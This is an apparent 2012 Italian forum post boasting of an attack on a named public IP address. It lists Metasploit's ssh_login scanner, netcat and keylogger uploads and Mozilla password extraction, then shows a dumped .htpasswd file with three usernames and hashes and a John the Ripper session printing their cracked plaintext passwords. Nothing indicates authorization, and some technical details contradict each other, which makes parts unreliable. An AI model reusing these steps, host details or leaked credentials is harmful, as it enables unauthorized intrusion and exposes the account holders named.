Testing attack con ARMITAGE, test attack

« Older   Newer »
  Share  
ph3wl
view post Posted on 14/3/2012, 00:51




[+]Target:67.8.179.124 windows xp
[+]Author: ph3wl
[+]Aplication:msf auxiliary/scanner/ssh/ssh_login
[+]Include:upload netcatand keyloger ,extract mozilla passwords,

Application Armitage

snapshot3fx

Collegamento da terminale:
snapshot4x

Acceso al 67.8.179.124.22 da porto 443
cat .htpasswd
root:$1$YC$lXJ7FSA9McptFwlENVR7C.:adminuser
ph3wl:$1$q8$sTyh7ZIIxE9WIyM0JLHIc0:adminuser
mstachowicz:$1$gI$4nfXnlU2F5AyzpFtGlzcb.:user

root@bt:/pentest/passwords/jtr# ./john newxp.txt
Loaded 3 password hashes with 3 different salts (FreeBSD MD5 [32/32])
unixunix (ph3wl)
3nterd*mx (mstachowicz)
3nterd*mx (root)
guesses: 3 time: 0:00:02:00 100.00% (2) (ETA: Tue Mart 12 10:15:43 2012) c/s: 12110 trying: 3nterd*mx
 
Top
0 replies since 14/3/2012, 00:51   84 views
  Share